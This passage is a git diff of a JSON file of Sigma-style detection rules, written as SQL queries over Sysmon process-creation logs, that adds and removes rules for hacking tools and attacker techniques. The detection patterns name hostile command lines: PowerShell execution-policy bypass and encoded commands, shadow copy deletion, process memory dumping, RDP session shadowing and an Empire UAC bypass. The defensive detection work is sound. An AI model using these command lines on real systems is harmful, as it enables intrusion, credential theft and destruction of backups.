\\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage 
LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE 
'% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE 
'\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a 
regsvr.exe execution that doesn't contain a DLL in the command line", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "status": "test", + "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in 
suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE 
'%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage 
LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp 
HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -9174,320 +8942,296 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + 
"attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" - }, - { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects 